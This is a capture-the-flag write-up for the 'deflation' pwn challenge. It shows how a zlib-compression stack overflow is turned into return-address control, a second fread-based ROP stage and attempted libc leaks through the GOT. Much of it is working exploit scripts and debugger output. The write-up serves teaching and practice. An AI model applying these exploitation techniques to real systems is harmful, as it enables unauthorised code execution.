Writeup by edoardo3512 for deflation

pwn x86/x64

April 14, 2025

We are given three files. The binary to exploit, the libc running on the server and its loader:

  • deflation
  • libc-2.31.so
  • ld-linux-x86-64.so.2

The binary deflation is a 64 bit, dynamically linked executable, with debug symbols still present.

$ file deflation
deflation: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./libs/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9f9004e64d78412fc211c5122029509ab2be767c, not stripped

$ checksec deflation
[*] '/deflation'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3ff000)
    RUNPATH:    b'./libs'
    Stripped:   No

We can see from checksec that the binary is not PIE and has no canary, so I am expecting a buffer overflow vulnerability to overwrite the return address with a ropchain. We are also expected to use the libc, so if there is not a second vulnerability to leak data we will probably need two ropchains, one to leak the libc address and one to call system("/bin/sh").

To make sure that the program will run the correct library while we develop our exploit, we renamed the libc to libc.so.6 (don’t be like me who always forgets this step) and used $patchelf --set-interpreter ./libs/ld-linux-x86-64.so.2 --set-rpath ./libs deflation to set the loader and path to the libraries with patchelf. This is why RUNPATH links to my libs folder. (Notice though that patchelf added a page at the beginning of the binary ( No PIE (0x3ff000) instead of the typical 0x400000). This is something to be careful about if you use relative addresses to the base of the binary to find your functions).

Exploration

Code

If we look at code of the program with Ghidra the program is quite straight forward with a main function and a function already identified as vuln by the author.

int main(void)

{
  int len;
  char buffer[256];

  len = fread(buffer,1,0x100,stdin);
  vuln(buffer,len);
  return 0;
}

void vuln(char *user_buffer,int len)

{
  char tmp_buffer[264];

  strm._64_4_ = 0;
  strm._68_4_ = 0;
  strm._72_4_ = 0;
  strm._76_4_ = 0;
  strm._80_8_ = 0;
  deflateInit2_(strm,0xffffffff,8,0x1f,8,0,"1.2.11",0x70);
  strm._32_4_ = 0x200;
  strm._0_8_ = user_buffer;
  strm._8_4_ = len;
  strm._24_8_ = tmp_buffer;
  deflate(strm,4);
  memcpy(user_buffer,tmp_buffer,strm._40_8_);
  deflateEnd(strm);
  fwrite(user_buffer,1,strm._40_8_,stdout);
  return;
}

From here we can see that the program is reading 256 bytes and then tries to compress them with a function that is probably vulnerable to a buffer overflow, but I don’t see an obvious bug. The stack frame in vuln is even larger than the one in main so how could our compressed data, which should take less space, overflow it ?

Fuzzing

Let’s try to fuzz a bit the program and get an idea of how it behaves. In this case I will test:

  • Only As
  • Random data to maximize the entropy
  • A single byte
from gdb_plus import *
from os import urandom as random_bytes

binary_name = "./deflation"
context.binary = binary_name

def check_length(debugger):
  """
  Log how much data we are copying back over the initial buffer
  """
  print(f"Compressed data: {debugger.args[2]}/256 bytes.")
  return False

def test(dbg, input_):
  dbg.b("plt.memcpy", callback=check_length) # Somehow the symbols of the libc give us a different address for memcpy so I put the breakpoint in the plt instead of the libc
  dbg.p.send(input_)
  dbg.c()
  print(f"status: {dbg._stop_reason}") # We expect "NOT RUNNING" if the program exited normally
  data = dbg.p.recvline(timeout=1)[:-1] # Ignore \n
  print(input_, "->", data)

with Debugger(context.binary) as dbg:
  test(dbg, b"A"*256)

with Debugger(context.binary) as dbg:
  test(dbg, random_bytes(256))

with Debugger(context.binary) as dbg:
  dbg.until("fread")
  dbg.args[2] = 1 # Change size read to 1 byte
  test(dbg, b"A")
Compressed data: 24/256 bytes.
status: NOT RUNNING
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' -> b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03st\x1c\xd9\x00\x00\x13[\x97I\x00\x01\x00\x00'

Compressed data: 279/256 bytes.
status: SIGSEGV
b"\x0b%\xd5py\\\xc0\xabl&\xa4\xa9|\x16\x04\x04\x83(h\xe4V\xbc\xe5\xc1\xe29\\\x90\x80\x8b)\t\x19\x0b\x14Q\x86j\xa2\x897\x8f\x15M\xe1\xfb\x8dVv?\x0b\xcf\xf9\x19(\xfc=m\x8a\x9ayb>\x84b\x03\xeeE\x82\xf8K\x9d4P|\xa3\xf3p\x86T\x86\xee\xf1\xd1\xc5\xda\x0f~)\xbb$n\xe1}\x9b6\xf1[\x1a\xfcB-\xf3\x0bF\x0f\xb1\x04\xab\xb1M\xc6_\xe4d\xe0t\x9b\xd9\xbe\xf0\xae\xc0\xa8\x1c\x05\xb7\r5r\xb6\xa0F\xb0z\x84\xf0\xa2I\xfe1\xae\xabL\n\x17\xb9ke\xf9H\r)\x86\xe2Z\xa3\xd92oF\xe0\xa50\xd6,\xb3\xb9\x1arn\\\xbem@\xb8\xbb0\xc2\xf3\xe5\xa6\xbfE\x02%\xc8\x7f\x97\x9f':\x17\\>\xdd\x98))J\xb0\xe6[\xbf\x15\x08\xe2\x89\x9e3\x90\x8f\xfd\xc4Z\x073\xad\x14\xe3\xae'\r5\x03\x9e\x81\xac\x1b\x01[\x1a\xf59\x7fP\xbbJ\xe8\x86\x99\x88O\x8c\xfe.\xd4*5\xb8\xedM\x11m\xf0\xad" -> b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03\x01\x00\x01\xff\xfe\x0b%\xd5py\\\xc0\xabl&\xa4\xa9|\x16\x04\x04\x83(h\xe4V\xbc\xe5\xc1\xe29\\\x90\x80\x8b)\t\x19\x0b\x14Q\x86j\xa2\x897\x8f\x15M\xe1\xfb\x8dVv?\x0b\xcf\xf9\x19(\xfc=m\x8a\x9ayb>\x84b\x03\xeeE\x82\xf8K\x9d4P|\xa3\xf3p\x86T\x86\xee\xf1\xd1\xc5\xda\x0f~)\xbb$n\xe1}\x9b6\xf1[\x1a\xfcB-\xf3\x0bF\x0f\xb1\x04\xab\xb1M\xc6_\xe4d\xe0t\x9b\xd9\xbe\xf0\xae\xc0\xa8\x1c\x05\xb7\r5r\xb6\xa0F\xb0z\x84\xf0\xa2I\xfe1\xae\xabL'

Compressed data: 21/256 bytes.
status: NOT RUNNING
b'A' -> b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03s\x04\x00\x8b\x9e\xd9\xd3\x01\x00\x00\x00'

Indeed, with random data, so data hardly compressible, the final buffer is longer than the initial one and causes a segfault, which means that it does overwrite the return address of a function!

Understanding zlib

Looking more into the documentation of how deflate works we find that it is based on encoding repeating bytes, so we know a buffer like [i for i in range(256)] can not be compressed. Since it is much more readable for our analysis we will use this one as our default input.

We can also write a small program to decompress the data we receive. Since the library is standard I could probably have done it in python with zlib, but by reflex, to keep the behaviour as close to the one in the challenge (I just didn’t want to understand the strm structure yet and was being lazy), I had chatGPT quickly write it in C after reading the vuln function.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <zlib.h>

void decompress(void *compressed_data, int compressed_len) {
    unsigned char output_buffer[1024]; // Adjust size as needed
    z_stream strm;

    // Initialize the decompression stream
    memset(&strm, 0, sizeof(strm));
    strm.avail_in = compressed_len;
    strm.next_in = compressed_data;
    strm.avail_out = sizeof(output_buffer);
    strm.next_out = output_buffer;

    if (inflateInit2(&strm, 31) != Z_OK) {
        fprintf(stderr, "inflateInit2 failed\n");
        return;
    }

    if (inflate(&strm, Z_FINISH) != Z_STREAM_END) {
        fprintf(stderr, "inflate failed\n");
        inflateEnd(&strm);
        return;
    }

    // Print the decompressed output
    fwrite(output_buffer, 1, strm.total_out, stdout);

    inflateEnd(&strm);
}

int main() {
    unsigned char input_buffer[1024];
    int read_size = fread(input_buffer, 1, sizeof(input_buffer), stdin);

    if (read_size <= 0) {
        fprintf(stderr, "Failed to read input\n");
        return 1;
    }

    decompress(input_buffer, read_size);
    return 0;
}

We have to compile it including libz (-lz)

gcc inflation.c -o inflation -lz

and then we can make sure it works.

from pwn import *

def unzip(data):
  with context.silent:
      p = process("./inflation")
      p.send(data)
      p.stdin.close()
      data = p.recv()
      p.close()
  return data

def zip(data):
  with context.silent:
      p = process("./deflation")
      p.send(data)
      p.stdin.close()
      data = p.recv()
      p.close()
  return data

data = b"ABCD" * 0x40
if data == unzip(zip(data)):
  log.success("unzip works as expected!")
else:
  log.failure("unzip doesn't work!")
unzip works as expected!

Exploitation

Buffer overflow

Let’s look at what data exactly is being overwritten when we overflow the buffer. I will print the stack before and after calling vuln, before and after calling deflate, and right before returning from main to see what overwrote the return address.

from gdb_plus import *

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
input_ = bytes([i for i in range(256)])
dbg.p.send(input_)
dbg.until("main+42")
print("stack main before call vuln:")
dbg.telescope(length=37)
#print(f"base pointer main: {hex(dbg.rbp)}") # There is no leave so it doesn't matter
dbg.until("vuln+64") # Setup stack
print("stack vuln before call deflate:")
dbg.telescope(length=38)
dbg.until("vuln+138") # Call deflate
print("stack vuln after call deflate:")
dbg.telescope(dbg.rsp+0x10, length=38) # +0x10 to ignore the 2 arguments pushed on stack to call deflateInit2_
dbg.until("vuln+203") # popped rbp
#print(f"new base pointer main: {hex(dbg.rbp)}")
dbg.finish()
print("stack main after call vuln:")
dbg.telescope(length=37)
dbg.until("main+57") # Return instruction
print("stack before return")
dbg.telescope(length=4)

To make it more readable I shortened here all the buffers.

stack main before call vuln:
0x00007fff7ee53830│+0x0000: 0x0706050403020100	 ← $rbp, $rdi
0x00007fff7ee53838│+0x0008: 0x0f0e0d0c0b0a0908
... user input ...
0x00007fff7ee53920│+0x00f0: 0xf7f6f5f4f3f2f1f0
0x00007fff7ee53928│+0x00f8: 0xfffefdfcfbfaf9f8

0x00007fff7ee53930│+0x0100: 0x0000000000401290  →  <__libc_csu_init+0000> push r15
0x00007fff7ee53938│+0x0108: 0x00007b0c3d97ed0a  →  <__libc_start_main+00ea> mov edi, eax
0x00007fff7ee53940│+0x0110: 0x00007fff7ee53a28  →  0x00007fff7ee55331  →  "/deflat[...]"
0x00007fff7ee53948│+0x0118: 0x000000017ee53d59
0x00007fff7ee53950│+0x0120: 0x0000000000401090  →  <main+0000> push rbp

stack vuln before call deflate:
0x00007fff7ee53700│+0x0000: 0x0000000000000000	 ← $rsp
0x00007fff7ee53708│+0x0008: 0x0000000067a5f69e
0x00007fff7ee53710│+0x0010: 0x0000000015559c39
0x00007fff7ee53718│+0x0018: 0x0000000067a5f69f
... random junk ...
0x00007fff7ee537f8│+0x00f8: 0x0000000000000000
0x00007fff7ee53800│+0x0100: 0x00007fff7ee53830  →  0x0706050403020100
0x00007fff7ee53808│+0x0108: 0x0000000000000000
0x00007fff7ee53810│+0x0110: 0x00007fff7ee53830  →  0x0706050403020100
0x00007fff7ee53818│+0x0118: 0x00000000004010d0  →  <_start+0000> xor ebp, ebp
0x00007fff7ee53820│+0x0120: 0x0000000000000000
0x00007fff7ee53828│+0x0128: 0x00000000004010bf  →  <main+002f> add rsp, 0x100

stack vuln after call deflate:
0x00007fff7ee53700│+0x0000: 0x0000000000088b1f	 ← $r13
0x00007fff7ee53708│+0x0008: 0x00feff0100010300
0x00007fff7ee53710│+0x0010: 0x0807060504030201
0x00007fff7ee53718│+0x0018: 0x100f0e0d0c0b0a09
... User input shifted right by 1 byte ...
0x00007fff7ee537f8│+0x00f8: 0xf0efeeedecebeae9
0x00007fff7ee53800│+0x0100: 0xf8f7f6f5f4f3f2f1
0x00007fff7ee53808│+0x0108: 0x73fffefdfcfbfaf9
0x00007fff7ee53810│+0x0110: 0x000000010029058c

0x00007fff7ee53818│+0x0118: 0x00000000004010d0  →  <_start+0000> xor ebp, ebp
0x00007fff7ee53820│+0x0120: 0x0000000000000000
0x00007fff7ee53828│+0x0128: 0x00000000004010bf  →  <main+002f> add rsp, 0x100

stack main after call vuln:
0x00007fff7ee53830│+0x0000: 0x0000000000088b1f	 ← $rsp
0x00007fff7ee53838│+0x0008: 0x00feff0100010300
0x00007fff7ee53840│+0x0010: 0x0807060504030201
0x00007fff7ee53848│+0x0018: 0x100f0e0d0c0b0a09
... User input shifted right by 1 byte ...
0x00007fff7ee53928│+0x00f8: 0xf0efeeedecebeae9
0x00007fff7ee53930│+0x0100: 0xf8f7f6f5f4f3f2f1
0x00007fff7ee53938│+0x0108: 0x73fffefdfcfbfaf9
0x00007fff7ee53940│+0x0110: 0x000000010029058c
0x00007fff7ee53948│+0x0118: 0x000000017ee53d59
0x00007fff7ee53950│+0x0120: 0x0000000000401090  →  <main+0000> push rbp

stack before return
0x00007fff7ee53938│+0x0000: 0x73fffefdfcfbfaf9	 ← $rsp
0x00007fff7ee53940│+0x0008: 0x000000010029058c
0x00007fff7ee53948│+0x0010: 0x000000017ee53d59
0x00007fff7ee53950│+0x0018: 0x0000000000401090  →  <main+0000> push rbp

From this we can see that the 279 bytes coming out of deflate are our raw input of 256 bytes simply wrapped in 23 bytes of metadata without any other changes. In particular, looking at our buffer starting at 0x00007fff7ee53830 we see that of those 23 bytes, 15 bytes are before our data and 8 are after. With this we do end up overwriting the return address of main, but given how our data is shifted we only have direct control over the 7 lowest bytes.

The most significant byte on the return address is set by our metadata, but the metadata depend on our payload, so in theory can we find a payload that generates metadata with the byte we want ? It doesn’t seem that far fetched since there are many more possible permutations of our input than possible bytes. Maybe we could even try to control it to the point that the rest is also valid address, letting use call two gadgets instead of one, but that feels much more unlikely. We will first focus on using a single gadget while keeping the other option in the back of our mind if we really need it (spoiler: we won’t).

First payload: setup future attack

With only one gadget what are our options ?

For sure the first thing to look for is a way to write more data on the stack so that we can send a longer ropchain to execute next. For example by calling fread which is already being used by the program.

Let’s keep track of what is the state of our registers when we reach the ret instruction in main.

...
print(dbg.execute("context regs"))
───────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0
$rbx   : 0x73fffefdfcfbfaf9
$rcx   : 0x0000773478feef33  →  0x5577fffff0003d48 ("H="?)
$rdx   : 0x000000001b8f13ac  →  0x0008000000080000
$rsp   : 0x00007ffe7b136f28  →  0x73fffefdfcfbfaf9
$rbp   : 0xf8f7f6f5f4f3f2f1
$rsi   : 0x0
$rdi   : 0x00007734790c1670  →  0x0000000000000000
$rip   : 0x00000000004010c9  →  <main+0039> ret
$r8    : 0x117
$r9    : 0x00007734790beb00  →  0x0000000000000000
$r10   : 0x6e
$r11   : 0x246
$r12   : 0x00000000004010d0  →  <_start+0000> xor ebp, ebp
$r13   : 0x0
$r14   : 0x0
$r15   : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
────────────────────────────────────────────────────────────────────────────────

We could try to call fread using the plt. The arguments needed for fread are rdi -> stack buffer, rsi -> size, rdx -> count, rcx -> stdin, but we can immediatly see that rcx is not pointing to stdin anymore though, so without other gadgets first to set it there is no way to call fread directly.

The other option then is to jump back into the main function where the program itself is calling fread. If we don’t let it set the count argument it will use instead the value that was left in rdx, which is much bigger now. This is a valid option because the main function is not using a leave instruction, so we don’t have to worry about the base pointer being corrupted if we don’t call the function from the beginning.

We can look at how fread is being called and we see how lucky we are. The order in which the arguments are stored are: count, size, stream and then ptr, so if we jump at 0x0401096 all the arguments are correctly set to call fread, but without changing the count variable stored in rdx.

        00401091 ba 00 01        MOV        EDX,0x100
                 00 00
        00401096 be 01 00        MOV        ESI,0x1
                 00 00
        0040109b 48 81 ec        SUB        RSP,0x100
                 00 01 00 00
        004010a2 48 8b 0d        MOV        RCX,qword ptr [stdin]
                 87 2f 00 00
        004010a9 48 89 e5        MOV        RBP,RSP
        004010ac 48 89 ef        MOV        RDI,RBP
        004010af e8 7c ff        CALL       <EXTERNAL>::fread
                 ff ff

When we finish executing our exploit rdx contains 0x1b8f13ac, which would be a valid number of bytes to read. The only problem is that since it’s almost 1GB of data we will probably not be able to send so much and be forced to send and EOF at some point, killing stdin (spoiler: we won’t). If we do so, instead of system("/bin/sh"), which would require further interactions with the process, we will probably need to do an open, read, write of the flag file so that we can extract it directly. Unfortunately this also mean that we would not be able to send another ropchain after leaking the libc. This may be bothersome, but let’s think about it later.

Controlling the return address

Let’s start by finding what input can make us jump to 0x0401096 in the first place. I will use gdb_plus to debug the binary and detect when the return address is correctly overwritten.

from gdb_plus import *

target_address = 0x0401096
target = p64(target_address)[:-1] # Remove the most significative byte that we don't control
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]

binary_name = "./deflation"
context.binary = binary_name

p = log.progress('Bruteforce padding')
for i in range(256):
    p.status(f"{i+1}/256")
    with Debugger(context.binary) as dbg:
      payload = shift(data, i) + target # Will be longer than 256 since the null bytes in the address do repeat
      dbg.p.send(payload[-256:])
      dbg.until("main+57")
      if dbg.read_pointer(dbg.rsp) == target_address:
        p.success(f"found {i=}")
        break

else:
  p.failure("Couldn't find offset")

We do get a valid payload!

[+] Bruteforce padding: found i=94

Limitations of calling fread(buffer, 1, …, stdin)

We found a valid payload, but how much data is it gonna read exactly ?

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57") # Finish the first execution
dbg.until("fread") # Reach corrupted fread
print(f"calling fread({hex(dbg.args[0])}, 1, {hex(dbg.args[2])}, stdin)")

If we run it multiple times we always get different sizes, but we are always around 1GB of data…

calling fread(0x7ffd038ea270, 1, 0x3b481312, stdin)

calling fread(0x7ffdb37d3d00, 1, 0xdff312, stdin)

calling fread(0x7ffe7200b060, 1, 0xa404312, stdin)

As discussed above sending that much data doesn’t seem to be an option, not just for the connection, but also because it will probably not fit on the stack, and trying to write outside may cause a segfault (spoiler: it doesn’t). I really don’t want to close the stream though so I first tried to see what would happen if we did send an absurd amount of data to the process anyway.

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57")
dbg.until("fread")
data = b"A" * dbg.args[2] # Send as much data as fread is expecting
dbg.finish(wait=False)
dbg.send(data)

Running this script we notice that although p.send seems to never return, fread does return immediately! If we then check rax we see that it only read 0x1000 bytes before stopping!

At the same time if we check the stack we see more than 4096 As written and instead the stack is completely filled.

(remote) gef➤  x/s 0x00007ffc2ac6edb0
0x7ffc2ac6edb0:	'A' <repeats 4688 times><error: Cannot access memory at address 0x7ffc2ac70000>

We can try to control how much data we send by adding a chunk at a time until the function returns.

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57")
dbg.until("fread")
buffer_address = dbg.args[0]
done = dbg.finish(wait=False)
dbg.p.send(b"A" * 0x1000)
counter = 0
chunk_size = 0x100
while not done.wait(timeout=0.5): # Same results with timeout=5 and chunks of 0x10, 0x500 or 0x1000 bytes. 0.1s though may be too short
    counter += 1
    dbg.p.send(b"B" * chunk_size)
print(f"sent {hex(0x1000 + counter * chunk_size)} bytes")
print("fread ->", hex(dbg.return_value))
print(dbg.execute(f"x/s {hex(buffer_address)}"))

The rule seems to be that the program will read as much data as fits on the stack one chunk at a time, with chunks of sizes up to 0x1000 bytes. Once a chunk doesn’t fit completely the function returns, although the return value is set to the amount of data consumed (so rounded up) and not the one actually written on the stack. To trigger the process though we have to send one more chunk that what will be read which will probably stay in the stream buffer.

sent 0x1400 bytes
fread() -> 0x1300
0x7ffc1bc2fcd0:	'A' <repeats 4096 times>, 'B' <repeats 816 times><error: Cannot access memory at address 0x7ffc1bc31000>

sent 0x2a00 bytes
fread() -> 0x2900
0x7ffdeee54690:	'A' <repeats 4096 times>, 'B' <repeats 6512 times><error: Cannot access memory at address 0x7ffdeee57000>

Execute multiple ropchains

If now we can send our second payload without having to kill stdin we will probably be able to send also the third one as intended. We just have to make sure to keep the stream buffer clean between each attack. If it is true that the last chunk of data needed to trigger the fread to return will still be in the stream buffer we have to let the program run some more until it empties it. If we send chunks of 0x100 bytes we just have to call main once and we should be good as this is how much the program normally reads in one execution.

from gdb_plus import *

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

dbg = Debugger(context.binary)
dbg.p.send(payload)
dbg.until("main+57")
dbg.until("fread")
done = dbg.finish(wait=False)
dbg.p.send(p64(dbg.elf.symbols["main"]) * (0x1000 // 8)) # Make a ropchain that constantly returns to the beginning of the program
counter = 0
while not done.wait(timeout=0.5):
    counter += 1
    dbg.p.send(b"B" * 0x100)
print(f"sent {hex(0x1000 + counter * 0x100)} bytes")
print(f"fread -> {hex(dbg.return_value)}")

# This call to fread should consume the last chunk of Bs we sent before
dbg.until("fread")
buffer_address = dbg.args[0]
dbg.finish()
print(dbg.read(buffer_address, 0x100))

# This call to fread should use the new data we send now
dbg.until("fread")
buffer_address = dbg.args[0]
dbg.p.sendline(b"C" * 0x100)
dbg.finish()
print(dbg.read(buffer_address, 0x100))

As expected the first call to fread consumed the Bs we used as padding, while the second one is taking the data we send next.

sent 0x3200 bytes
fread -> 0x3100
b'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
b'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'

Now we have to make sure that if the program doesn’t die when we fill the stack it is not just because gdb is keeping it alive or because my system has some strange permissions. So let’s test it remotely.

from gdb_plus import *

HOST = "127.0.0.1"
PORT = 4000
binary_name = "./deflation"
context.binary = binary_name

def shift(array, n):
  return array[n:] + array[:n]

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
payload_1 = shift(data, 94) + target
payload_1 = payload_1[-256:]

with Debugger(context.binary).remote(HOST, PORT) as dbg:
  dbg.p.send(payload_1)
  expected_data = dbg.p.recv()

dbg = Debugger(context.binary).remote(HOST, PORT)
dbg.c(wait=False)
for i in range(10):
  p = log.progress(f"loop {i + 1}")
  dbg.p.send(payload_1)
  data = dbg.p.recv()
  assert data == expected_data

  p.status("Sending second payload")
  ropchain = b""
  payload_2 = b"A" * 264 + ropchain
  payload_2 += p64(dbg.elf.symbols["main"]) * ((0x1000 - len(payload_2)) // 8)
  dbg.p.send(payload_2)    # We could try to check the output to see what was left in the buffer
  while dbg.p.recv(timeout=0.5) == b"":
    dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x100)
  dbg.p.recv(timeout=0.5) # Empty buffer if not done yet
  p.success("Done")

Indeed the buffer is perfectly aligned and we can repeat the process multiple times!

$python3 test_remote.py REMOTE
[+] loop 1: Done
[+] loop 2: Done
[+] loop 3: Done
[+] loop 4: Done
[+] loop 5: Done
[+] loop 6: Done
[+] loop 7: Done
[+] loop 8: Done
[+] loop 9: Done
[+] loop 10: Done

Second payload: leak the libc

While the buffer overflow was quite straightforward, the main challenge starts now. We have a good control over the execution of the program, but we still have to find how to leak data from it. The basic idea would be to call something like fwrite(got, 1, x, stdout), but the main limitation we face is that with the gadgets found with ROPgadget we can only set rsi and rdi, so we don’t have control over the third and fourth arguments of functions we want to call.

Failed attempts and unintended solution

Jumping inside vuln to call fwrite with data from the GOT

Since we can not set the fourth argument of fwrite, the only way to have access to stdout when we call it is to let vuln set it first.

If we look at the code of vuln, stdout is loaded in the registers right after the call to deflateEnd, while the buffer to print is taken from rbp.

        0040125f e8 0c fe        CALL       <EXTERNAL>::deflateEnd
                 ff ff
        00401264 48 8b 0d        MOV        RCX,qword ptr [stdout]
                 b5 2d 00 00
        0040126b 48 89 ef        MOV        user_buffer,RBP
        0040126e 48 8b 15        MOV        RDX,qword ptr [strm[40]]
                 f3 2d 00 00
        00401275 be 01 00        MOV        len,0x1
                 00 00
        0040127a e8 01 fe        CALL       <EXTERNAL>::fwrite
                 ff ff

We can therefore try to send an address we want to leak, such as got.fwrite, just before our return address so that it gets loaded in the base pointer and then jump to 0x0401264.

payload_2 = b"A" * 256 + p64(dbg.elf.symbols["got.fwrite"]) + p64(0x0401264) # vuln.fwrite takes rbp as the buffer

This attack does leak the got, but vuln does implements a version of leave using r13 instead of rbp, so we segfault when we try to continue because the stack gets corrupted. The only ways to avoid this problem would be to create a fake stack in the bss or to jump before we set r13.

Creating a fake stack in the bss could be an option, but I hadn’t found a gadget to write there before solving the challenge (You can try it if you want 😉). Letting vuln save the stack pointer in r13 though is not an option in this case. This is being set before we call deflate and memcpy, so it will at least require to use as buffer an area that is writeable instead of our GOT.

full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()

payload_2 = b"A" * 256 + p64(dbg.elf.symbols["got.fwrite"]) + p64(0x0401264)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x20)
dbg.call("fflush", [0])
dbg.p.recv()

dbg.until("fwrite")
dbg.finish()
dbg.call("fflush", [0])
data = dbg.p.recv()
log.success(f"leaked: {hex(u64(data[:8]))}")
Jumping inside vuln to copy the GOT and then print it

Jumping at the end of vuln is not possible because of how the function cleans the stack, so we can try to jump in the middle of the function instead. For example we can jump right after deflate has been called, pretend the GOT contains our compressed data, and then let the function copy it back to the stack or the bss before printing it with fwrite.

To call memcpy though vuln uses r13 as the src. This prevents us from pointing at the same time to the GOT to copy libc addresses and to the stack to keep the frame valid. It seems like there is no way to leak data with vuln that is not in the buffer that gets compressed, and therefore we can not leak data without also overwriting it.

call vuln to compress strm itself

The only option left then is to find a libc address in the bss. We need an area that we can compress and overwrite with vuln, but at the same time contains an address to the libc.

Letting vuln corrupt the pointers to stdin and stdout is not an option since it would break the program, but if we look at the structure for strm we can see that two pointers are used for the data on the stack and then two are functions that look like from the libc. We may try to leak those last two hoping that they are not needed after calling deflate.

(remote) gef➤  x/14gx 0x0404040
0x404040 <strm>:	0x00007ffdeb951a30	0x0000000000000000
0x404050 <strm+16>:	0x0000000000000100	0x00007ffdeb951818
0x404060 <strm+32>:	0x00000000000001e8	0x0000000000000018
0x404070 <strm+48>:	0x0000000000000000	0x000000001eb082b0
0x404080 <strm+64>:	0x00007fd31436a3d0	0x00007fd31436a3e0
0x404090 <strm+80>:	0x0000000000000000	0x0000000000000001
0x4040a0 <strm+96>:	0x0000000049975b13	0x0000000000000000

The problem here is not so much that unfortunately those function pointers are used later in deflateEnd, causing again a segfault of the program, but mostly - something that I just realized now while writing - that those are NOT libc addresses, but addresses in the libz!

[addr = `0x00007fd31436a3e0`]
0x00007fd314367000 0x00007fd314378000 0x0000000000002000 r-x /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
Create fake strm to leak libz and then call vuln(libz.GOT)

I wanted to add one more option now that I started thinking about the libz in case someone was wondering why it would fail. Looking at the libz we can see that the library is partial RELRO. This means that although it will probably break something we can still try to use that GOT as buffer by letting vuln overwrite part of it in exchange of the leak of the addresses it contained.

The first thing we need though to not segfault when leaking the libz is to create first a fake strm structure and let vuln populate it. Once we have it in the bss we can call vuln legitimately this time to compress this fake structure without worrying about the compression crashing, since those function pointers are not being used anymore.

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined __stdcall vuln(undefined8 user_buffer, int len)
             undefined         AL:1           <RETURN>
             undefined8        RDI:8          user_buffer
             int               ESI:4          len
             undefined[256]    Stack[-0x128   tmp_buffer
                             vuln
        004011c0 41 55           PUSH       R13
        004011c2 66 0f ef c0     PXOR       XMM0,XMM0
        004011c6 48 8d 05        LEA        RAX,[s_1.2.11_00402004]
                 37 0e 00 00
        004011cd 45 31 c9        XOR        R9D,R9D
        004011d0 41 54           PUSH       R12
        004011d2 41 b8 08        MOV        R8D,0x8
                 00 00 00
        004011d8 b9 1f 00        MOV        ECX,0x1f
                 00 00
